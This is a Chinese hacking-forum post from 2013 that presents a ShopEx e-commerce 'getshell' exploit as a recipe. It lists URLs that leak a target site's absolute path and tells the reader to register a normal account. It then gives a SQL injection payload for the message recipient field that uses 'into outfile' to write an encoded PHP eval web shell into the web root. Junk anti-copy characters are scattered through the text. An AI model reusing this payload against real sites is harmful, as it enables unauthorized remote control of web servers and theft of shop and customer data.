找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1778|回复: 0
打印 上一主题 下一主题

shopex前台普通用户getshell最新漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:28:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一个:想办法找到目标网站的绝对路径
$ t" L" \  a' h$ E$ y* T
; C; z3 A$ p& i: X9 Lhttp://www.political-security.com/install/svinfo.php?phpinfo=true
9 d$ I' s) H& E7 M5 Y1 r
3 c* v& F. B) R" Lhttp:/www.political-security.com/core/api/shop_api.php
5 K: L. I" ?1 P& T9 D2 e5 `3 Z  ~6 x5 g* v+ f1 C) @6 m
http://www.political-security.co ... api_b2b_2_0_cat.php
0 _; l* M$ c7 b
+ S, P& K/ X6 ~. w& j& qhttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
4 W/ [7 Z* S* p% t3 I* k& w) s4 V  _# S( s
http://www.political-security.co ... i_b2b_2_0_brand.php
7 k) Z7 `& @& g- V' `) g第二个:注册一个普通用户, d6 R' L8 v* \7 ^' n
8 F3 B7 u  q3 T6 S3 X, K/ i! \
http://www.political-security.com/?passport-signup.html
" r3 ~& E  g2 v
6 |8 b/ F( T. |' |第三个: 发送消息 0 H: n8 b4 _" N8 q; \( R
5 B4 Y- Z9 t8 W! t5 }
http://www.political-security.com/?member-send.html. s9 t; J4 v- d" `# N
发送给中填写
, a8 I' L+ z9 G* ]0 B( nantian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表